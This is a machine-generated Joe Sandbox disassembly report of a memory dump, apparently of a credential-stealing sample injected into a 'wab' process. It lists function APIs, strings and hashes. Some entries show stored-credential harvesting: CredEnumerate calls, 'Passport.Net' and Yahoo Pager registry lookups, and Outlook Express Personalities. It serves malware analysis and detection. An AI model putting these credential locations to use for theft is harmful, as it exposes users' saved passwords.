                                                                                                                                                                                          • memcpy.MSVCRT ref: 004063F3
                                                                                                                                                                                          • memcpy.MSVCRT ref: 00406420
                                                                                                                                                                                          • memcpy.MSVCRT ref: 00406435
                                                                                                                                                                                            • Part of subcall function 0040625B: memcpy.MSVCRT ref: 00406287
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy$memset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 438689982-0
                                                                                                                                                                                          • Opcode ID: c11b14cc7bfefcbecd474d69538c451392e9e517f6ba4719ba6800d6460efb6e
                                                                                                                                                                                          • Instruction ID: a962c966a65fcbb98db0a5903e2df7d2d9caef1a51b72161af640e80cc8fe1a9
                                                                                                                                                                                          • Opcode Fuzzy Hash: c11b14cc7bfefcbecd474d69538c451392e9e517f6ba4719ba6800d6460efb6e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 744140B290050DBEEB51DAE8CC41EEFBB7CAB4C704F004476F704F6051E635AA598BA6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00443E22 Relevance: 8.9, APIs: 7, Instructions: 147stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 00443E43
                                                                                                                                                                                          • memset.MSVCRT ref: 00443E5C
                                                                                                                                                                                          • memset.MSVCRT ref: 00443E70
                                                                                                                                                                                            • Part of subcall function 00443946: strlen.MSVCRT ref: 00443953
                                                                                                                                                                                          • strlen.MSVCRT ref: 00443E8C
                                                                                                                                                                                          • memcpy.MSVCRT ref: 00443EB1
                                                                                                                                                                                          • memcpy.MSVCRT ref: 00443EC7
                                                                                                                                                                                            • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CFB8
                                                                                                                                                                                            • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040CFE4
                                                                                                                                                                                            • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040CFFA
                                                                                                                                                                                            • Part of subcall function 0040CFC5: memcpy.MSVCRT ref: 0040D031
                                                                                                                                                                                            • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040D03B
                                                                                                                                                                                          • memcpy.MSVCRT ref: 00443F07
                                                                                                                                                                                            • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CF6A
                                                                                                                                                                                            • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CF94
                                                                                                                                                                                            • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040D00C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpymemset$strlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2142929671-0
                                                                                                                                                                                          • Opcode ID: 1fb1ec72e13faa5c4450662030dd608fc909945337c7cb58045cb7f4428127cf
                                                                                                                                                                                          • Instruction ID: 7aa756fa7cbdb75c5c05895f31091f080fe59031f56f6a961c38bdf577465876
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1fb1ec72e13faa5c4450662030dd608fc909945337c7cb58045cb7f4428127cf
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D513BB290011EAADB10EF55CC81AEEB3B9BF44218F5445BAE509E7141EB34AB49CF94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040F057 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 97stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00404666: _mbscpy.MSVCRT ref: 004046B5
                                                                                                                                                                                            • Part of subcall function 004045D6: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F07D,?,00000000), ref: 004045E3
                                                                                                                                                                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 004045FC
                                                                                                                                                                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredFree), ref: 00404608
                                                                                                                                                                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404614
                                                                                                                                                                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404620
                                                                                                                                                                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040462C
                                                                                                                                                                                            • Part of subcall function 0040472F: LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                                                                                                                                                                            • Part of subcall function 0040472F: GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F123
                                                                                                                                                                                          • strlen.MSVCRT ref: 0040F133
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040F144
                                                                                                                                                                                          • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F151
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                                                                                                                                                          • String ID: Passport.Net\*
                                                                                                                                                                                          • API String ID: 2329438634-3671122194
                                                                                                                                                                                          • Opcode ID: c0e35485f09b5a24e447f0910c227e843a67b38e8fc9a121e48f37b6dcdb3ffc
                                                                                                                                                                                          • Instruction ID: b181dd8ad3303716fcb3fe51c6d72bcd9c0cca2a33dd7682b011125bf867cc1e
                                                                                                                                                                                          • Opcode Fuzzy Hash: c0e35485f09b5a24e447f0910c227e843a67b38e8fc9a121e48f37b6dcdb3ffc
                                                                                                                                                                                          • Instruction Fuzzy Hash: B5316D76900109EBDB20EF96DD45EAEB7B9EF85701F0000BAE604E7291D7389A05CB68
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004032A9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00403158: strchr.MSVCRT ref: 0040326D
                                                                                                                                                                                          • memset.MSVCRT ref: 004032FD
                                                                                                                                                                                          • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403317
                                                                                                                                                                                          • strchr.MSVCRT ref: 0040334C
                                                                                                                                                                                            • Part of subcall function 004023D7: _mbsicmp.MSVCRT ref: 0040240F
                                                                                                                                                                                          • strlen.MSVCRT ref: 0040338E
                                                                                                                                                                                            • Part of subcall function 004023D7: _mbscmp.MSVCRT ref: 004023EB
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                                                                                                          • String ID: Personalities
                                                                                                                                                                                          • API String ID: 2103853322-4287407858
                                                                                                                                                                                          • Opcode ID: 4d90838e2d1a2817d3f702c1c820bc4a99c4f205016c2976f5c78779a4109539
                                                                                                                                                                                          • Instruction ID: 94df084552130989d7eb446100fdb0be3a34b05fea2c71b6ffce82199638926a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d90838e2d1a2817d3f702c1c820bc4a99c4f205016c2976f5c78779a4109539
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5921BA71B04158AADB11EF65DC81ADDBB6C9F10309F1400BBFA44F7281DA78DB46866D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004101D8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 004101EF
                                                                                                                                                                                          • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 004101FC
                                                                                                                                                                                          • memcpy.MSVCRT ref: 00410238
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • 00000000-0000-0000-0000-000000000000, xrefs: 004101F7
                                                                                                                                                                                          • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 004101EA
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FromStringUuid$memcpy
                                                                                                                                                                                          • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                                                                                                                                          • API String ID: 2859077140-3316789007
                                                                                                                                                                                          • Opcode ID: 47d2852bcb6be23f486a4ed132040bb4fca7e7f7f1bca8e0f8c40ade59038cba
                                                                                                                                                                                          • Instruction ID: ae29383cbd57fcea5ed56c9c200a46c16443c4e74b3f506479b718b79cf0bdd8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 47d2852bcb6be23f486a4ed132040bb4fca7e7f7f1bca8e0f8c40ade59038cba
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1801C43790001CBADF019B94CC40EEB7BACEF4A354F004023FD55D6141E678EA8487A5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00443A35 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 51registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 00443A57
                                                                                                                                                                                            • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                                                                                                                                                                            • Part of subcall function 00410452: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C69,?,?,?,?,00401C69,?,?,?), ref: 0041046D
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 00443AC3
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseOpenQueryValuememset
                                                                                                                                                                                          • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                                                                                                                          • API String ID: 1830152886-1703613266
                                                                                                                                                                                          • Opcode ID: 650c04e09b991093e9736741da7e0d3a8797bac6cd011315facee49111a37a9d
                                                                                                                                                                                          • Instruction ID: 86b235c3fd45d03c271013e996efd952a38f3d6ae4618920ee3f021b32bc4f63
                                                                                                                                                                                          • Opcode Fuzzy Hash: 650c04e09b991093e9736741da7e0d3a8797bac6cd011315facee49111a37a9d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 500192B6900118BBEB10AA55CD01FAE7A6C9F90715F140076FF08F2212E379DF5587A9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040900D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 00409031
                                                                                                                                                                                          • GetPrivateProfileStringA.KERNEL32(00451308,0000000A,0044551F,?,00001000,00451200), ref: 00409053
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040906D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • {?@ UD, xrefs: 0040900D
                                                                                                                                                                                          • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 0040901A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: PrivateProfileString_mbscpymemset
                                                                                                                                                                                          • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>${?@ UD
                                                                                                                                                                                          • API String ID: 408644273-2682877464
                                                                                                                                                                                          • Opcode ID: 378cf609773933abd0cbf0de7e3743951131b1a096d6e983a9466431b2c11096
                                                                                                                                                                                          • Instruction ID: 644781a60c69e86f7c2c511092586478b4ed4a6ca21543a67b17e89033411e60
                                                                                                                                                                                          • Opcode Fuzzy Hash: 378cf609773933abd0cbf0de7e3743951131b1a096d6e983a9466431b2c11096
                                                                                                                                                                                          • Instruction Fuzzy Hash: 53F0E9729041987BEB129764EC01FCA77AC9B4974BF1000E6FB49F10C2D5F89EC48AAD
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00406B15 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorLastMessagesprintf
                                                                                                                                                                                          • String ID: Error$Error %d: %s
                                                                                                                                                                                          • API String ID: 1670431679-1552265934
                                                                                                                                                                                          • Opcode ID: 69570e8fca1396db75b798702dd88894c728b3c47429f38a677bbfbefaa49fd2
                                                                                                                                                                                          • Instruction ID: c7de35334a9b91ea45d990eb2cc533a67ee34048a8af2c328f2cc0c5e5106846
                                                                                                                                                                                          • Opcode Fuzzy Hash: 69570e8fca1396db75b798702dd88894c728b3c47429f38a677bbfbefaa49fd2
                                                                                                                                                                                          • Instruction Fuzzy Hash: BBF0ECBA90010877DB11BB54DC05F9A77FCBB81304F1500B6FA45F2142EE74DA058F99
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00410909 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(shlwapi.dll,000003ED,774171C0,00405E9E,00000000), ref: 00410912
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 00410920
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00410938
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                          • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                                                          • API String ID: 145871493-1506664499
                                                                                                                                                                                          • Opcode ID: f25734f4fc4b11147bd7f5e2528d9bf4594faa664b5814fe0a2756d8d7966d13
                                                                                                                                                                                          • Instruction ID: 7569959bf229cfaf5f1ab8cb2858e1476927bfd88fe16924fdc565eaa6c9b3dd
                                                                                                                                                                                          • Opcode Fuzzy Hash: f25734f4fc4b11147bd7f5e2528d9bf4594faa664b5814fe0a2756d8d7966d13
                                                                                                                                                                                          • Instruction Fuzzy Hash: 15D05B797006107BFB215735BC08FEF6AE5DFC77527050035F950E1151CB648C42896A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0043D438 Relevance: 8.0, APIs: 3, Strings: 2, Instructions: 478COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$memcpy
                                                                                                                                                                                          • String ID: $no query solution
                                                                                                                                                                                          • API String ID: 368790112-326442043
                                                                                                                                                                                          • Opcode ID: d1b20270b8fca8508a10612e54657d8b0a662355ac249add9ed08d121aaec26c
                                                                                                                                                                                          • Instruction ID: 5801c9734c6bd427e286c4e355069e6ae2e92931dd4aa2b8c604a71db9229eec
                                                                                                                                                                                          • Opcode Fuzzy Hash: d1b20270b8fca8508a10612e54657d8b0a662355ac249add9ed08d121aaec26c
                                                                                                                                                                                          • Instruction Fuzzy Hash: D012AC75D006199FCB24CF99D481AAEF7F1FF08314F14915EE899AB351E338A981CB98
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0043000F Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 237COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • unknown column "%s" in foreign key definition, xrefs: 0043027A
                                                                                                                                                                                          • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430087
                                                                                                                                                                                          • foreign key on %s should reference only one column of table %T, xrefs: 0043005F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                          • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                          • API String ID: 3510742995-272990098
                                                                                                                                                                                          • Opcode ID: ba7cc926a2513b3f0d61d7686d9ea4b43c1dda64fb95451b7aee5590be9ae86f
                                                                                                                                                                                          • Instruction ID: b65499b1f20d22348a3d217da3c858198d90c87fbf4aa33eef889ec12c855700
                                                                                                                                                                                          • Opcode Fuzzy Hash: ba7cc926a2513b3f0d61d7686d9ea4b43c1dda64fb95451b7aee5590be9ae86f
                                                                                                                                                                                          • Instruction Fuzzy Hash: BFA14C75A00209DFCB14CF99D590AAEBBF1FF48304F14869AE805AB312D779EE51CB94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0043CB52 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 214COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                          • String ID: H
                                                                                                                                                                                          • API String ID: 2221118986-2852464175
                                                                                                                                                                                          • Opcode ID: 82ed15864ef5b3a3dd0266e33bdbcb26a787e81eb1be7ca6d5995a5f4ce5c711
                                                                                                                                                                                          • Instruction ID: 0231d824907604898156c72f74438a53b00a2a6e63cdef361d574d9feb60fc4e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 82ed15864ef5b3a3dd0266e33bdbcb26a787e81eb1be7ca6d5995a5f4ce5c711
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D915775C00219DBDF20CF95C881AAEF7B5FF48304F14949AE959BB241E334AA85CFA5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0041D3D8 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 175COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcmp$memcpy
                                                                                                                                                                                          • String ID: @ $SQLite format 3
                                                                                                                                                                                          • API String ID: 231171946-3708268960
                                                                                                                                                                                          • Opcode ID: 5952f075a97c97ad06d3c6058b6006b849409e8323ae21947051dcee29b786b4
                                                                                                                                                                                          • Instruction ID: 154dd893183b882ddc8616fc7eef56b16fb129afe1b119523047def7d92feb70
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5952f075a97c97ad06d3c6058b6006b849409e8323ae21947051dcee29b786b4
                                                                                                                                                                                          • Instruction Fuzzy Hash: C451B1B1E00604AFDB20DF69C881BDAB7F5AF54308F14056FD44597741E778EA84CBA9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00424D44 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 173COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                          • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                                                                                                                          • API String ID: 3510742995-3170954634
                                                                                                                                                                                          • Opcode ID: d7603b0dda69ecf518d4b766e7e4f504cd7a7b4266dab8eccfe297bae9d2bc32
                                                                                                                                                                                          • Instruction ID: 0d7bce0817bf65c9dfa0535c92c7df176da35528cc665cc261d5cec065e4eab6
                                                                                                                                                                                          • Opcode Fuzzy Hash: d7603b0dda69ecf518d4b766e7e4f504cd7a7b4266dab8eccfe297bae9d2bc32
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4361C031A046259FDB14DFA4D480BAEBBF1FF48304F55849AE904AB392D738ED51CB98
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00413F5C Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 132COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy$memset
                                                                                                                                                                                          • String ID: winWrite1$winWrite2
                                                                                                                                                                                          • API String ID: 438689982-3457389245
                                                                                                                                                                                          • Opcode ID: 0d7f83051426e72d393f7901bd0e4f2f845d9ffb714df67e86fd0046f80122d9
                                                                                                                                                                                          • Instruction ID: 411cc920c71d47ae3c136763a4be7e00f30539a89a3c59ace8e577baf045dca9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0d7f83051426e72d393f7901bd0e4f2f845d9ffb714df67e86fd0046f80122d9
                                                                                                                                                                                          • Instruction Fuzzy Hash: F9417F72A00209EBDF00CF95CC41ADE7BB5FF48315F14452AF614A7280D778DAA5CB99
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00413E34 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 109COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                                          • String ID: winRead
                                                                                                                                                                                          • API String ID: 1297977491-2759563040
                                                                                                                                                                                          • Opcode ID: ffe010aae32d2fe9b2a966a78d406535a1fbcfae657499b63a226c622339ee24
                                                                                                                                                                                          • Instruction ID: 3967e01906e40ec71704122980e40950556eef8199585a058b54f4718b0c424a
                                                                                                                                                                                          • Opcode Fuzzy Hash: ffe010aae32d2fe9b2a966a78d406535a1fbcfae657499b63a226c622339ee24
                                                                                                                                                                                          • Instruction Fuzzy Hash: 46318B72A00309ABDF10DE69CC86ADE7B69AF84315F14446AF904A7241D734DAA48B99
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040A8C2 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
                                                                                                                                                                                            • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
                                                                                                                                                                                          • memset.MSVCRT ref: 0040A8F8
                                                                                                                                                                                            • Part of subcall function 0041096F: memcpy.MSVCRT ref: 004109DD
                                                                                                                                                                                            • Part of subcall function 0040A245: _mbscpy.MSVCRT ref: 0040A24A
                                                                                                                                                                                            • Part of subcall function 0040A245: _strlwr.MSVCRT ref: 0040A28D
                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040A93D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                                                                                                                                                                          • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                                          • API String ID: 3337535707-2769808009
                                                                                                                                                                                          • Opcode ID: b0ab3c576635bf4da161b26e96517a42775f10b149b223ac01af6493df536d2f
                                                                                                                                                                                          • Instruction ID: b3463478cabe4832a9b1b799bbf2f925c18d395200ae258af25e9b21d14a16f2
                                                                                                                                                                                          • Opcode Fuzzy Hash: b0ab3c576635bf4da161b26e96517a42775f10b149b223ac01af6493df536d2f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3611BF31600225BFEB11AF64CC42F957B64FF04318F10406AF509265A2DB7ABD70DB89
                                                                                                                                                                                          Uniqueness

